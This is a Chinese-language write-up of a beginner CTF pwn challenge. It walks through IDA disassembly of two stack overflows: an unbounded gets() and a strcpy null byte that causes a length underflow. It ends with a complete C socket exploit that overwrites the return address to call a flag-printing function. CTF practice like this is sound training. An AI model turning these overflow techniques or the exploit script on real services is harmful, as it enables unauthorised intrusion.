Pwnstep1-2 Writeup

协会平台更新了。放一篇writeup

一道pwn的简单题目,主要练练栈溢出。

##STEP1:

nc连接上去之后是3个选项。其中1,2都有字符串的输入。先丢ida分析。
根据一些字符串的输出理清函数的调用关系。先来step1.
提示输入字符串(不限长度的)然后rol13加密。重点是如下的分支跳转。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
.text:0804891E 09C                 cmp     [ebp+var_D], 5Ch             ; <-比较[esp+var_D]与5Ch。成功这调用函数打印flag。
.text:08048922 09C jnz short loc_8048956
.text:08048924 09C sub esp, 0Ch
.text:08048927 0A8 push offset aCongratulation ; "Congratulations you've got the point!"
.text:0804892C 0AC call _puts
.text:08048931 0AC add esp, 10h
.text:08048934 09C sub esp, 0Ch
.text:08048937 0A8 push offset aGiveYouWhatYou ; "Give you what you want:"
.text:0804893C 0AC call _puts
.text:08048941 0AC add esp, 10h
.text:08048944 09C sub esp, 0Ch
.text:08048947 0A8 push offset file ; "flags/step1"
.text:0804894C 0AC call sub_80486AB ; <-打印flag的函数。参数是flags/step1
.text:08048951 0AC add esp, 10h
.text:08048954 09C jmp short loc_8048966 ; Jump
.text:08048956 ; ---------------------------------------------------------------------------
.text:08048956
.text:08048956 loc_8048956: ; CODE XREF: sub_8048781+1A1↑j
.text:08048956 09C sub esp, 0Ch
.text:08048959 0A8 push offset aYes__youSeeRot ; "Yes..you see ROT13 runing well but do y"...
.text:0804895E 0AC call _puts
.text:08048963 0AC add esp, 10h

前面还有个不限长度的gets函数,所以是只要输入字符串覆盖就可以了。
构造字符串’a’*(0x94-0x0D) + 0x5c(就是字符’\’)
手工输入即可得到flag


##STEP2:

分析step2的程序流程,首先输入密码。密码为明文很容易发现为”=L=why_dont_you_guess_me?”输入正确后提示输入验证码,为109然后就结束了。
随后我再查找.const段发现字符串”flags/step2”,猜想使用这个参数调用step1中打印flag的函数,但是两个输入函数都是限制了输入长度的,所以没有办法进行栈溢出攻击。

于是仔细的分析step2的代码。发现在strcpy处有一个漏洞,因为strcpy复制后总是加上’\0’,正好将[esp+var_c]处的用以限制输入长度变量覆盖为0.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
.text:08048A01                 sub     esp, 8
.text:08048A04 lea eax, [ebp+nptr]
.text:08048A0A push eax ; src
.text:08048A0B lea eax, [ebp+dest]
.text:08048A0E push eax ; dest
.text:08048A0F call _strcpy ;这里的strcpy把[esp+var_c]处变量覆盖为零。
.text:08048A14 add esp, 10h
.text:08048A17 sub esp, 0Ch
.text:08048A1A push offset aOh__andINeedTo ; "Oh..And,I need to check if you are huma"...
.text:08048A1F call _puts
.text:08048A24 add esp, 10h
.text:08048A27 sub esp, 0Ch
.text:08048A2A push offset aPleaseCalculat ; "Please calculate:?"...
.text:08048A2F call _puts
.text:08048A34 add esp, 10h
.text:08048A37 mov eax, [ebp+var_C]
.text:08048A3A sub eax, 1 ; <-这里是关键,将已经为0的eax再减去1。可以溢出啦。
.text:08048A3D sub esp, 4
.text:08048A40 push 0Ah
.text:08048A42 push eax
.text:08048A43 lea eax, [ebp+nptr]
.text:08048A49 push eax
.text:08048A4A call sub_804870E ;可以在这里开心的构造溢出了

所以最终思路是

先发送=L=why_dont_you_guess_me? + ‘a’38 + ‘\n’覆盖变量。
然后发送119 + ‘\0’
1101 + 0x0804894C(函数地址) + 0x08048c3a(参数地址) + ‘\n’

本人是个渣,不会用高大上的python,所以用c语言写了段代码。。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
#include <winsock2.h> 
#include <stdio.h>
#include <Windows.h>
#pragma comment(lib,"ws2_32.lib")

int main (void)
{
int i;
WSADATA wsaData;
SOCKET sockClient;
SOCKADDR_IN addrServer;
char recvBuf[5000]={0};
WSAStartup(MAKEWORD(2,2),&wsaData);
sockClient=socket(AF_INET,SOCK_STREAM,0);

addrServer.sin_addr.S_un.S_addr=inet_addr("****hide****");
addrServer.sin_family=AF_INET; addrServer.sin_port=htons(7777);
connect(sockClient,(SOCKADDR*)&addrServer,sizeof(SOCKADDR));

recv(sockClient,recvBuf,1000,0);
printf("%s",recvBuf);
printf("\n*****************************************************************\n");
for(i=0;i<1000;recvBuf[i]=0,i++);

char message[2000]={'2','\x0a'};
send(sockClient,message,2,0);
Sleep(1000);
recv(sockClient,recvBuf,1000,0);
printf("%s",recvBuf);
printf("\n*****************************************************************\n");
for(i=0;i<1000;recvBuf[i]=0,i++);

for(i=0;i<64;i++)
message[i]='1';
message[64]='\x0a';
strcpy_s(message,26,"=L=why_dont_you_guess_me?");
message[25]='1';

send(sockClient,message,65,0);
Sleep(1000);
recv(sockClient,recvBuf,1000,0);
printf("%s",recvBuf);
printf("\n*****************************************************************\n");
for(i=0;i<5000;recvBuf[i]=0,i++);

for(i=0;i<1104;i++)
message[i]='\0';
message[1104]=0x4c;
message[1105]=0x89;
message[1106]=0x04;
message[1107]=0x08;
message[1108]=0x3a;
message[1109]=0x8c;
message[1110]=0x04;
message[1111]=0x08;
message[1112]=0x0a;
message[0]='1';
message[1]='0';
message[2]='9';

send(sockClient,message,1113,0);
Sleep(1000);
recv(sockClient,recvBuf,5000,0);
printf("%s",recvBuf);
printf("\n*****************************************************************\n");


closesocket(sockClient);
WSACleanup();
}

flag get!

啥,要pwn文件!反正没人看,就不传了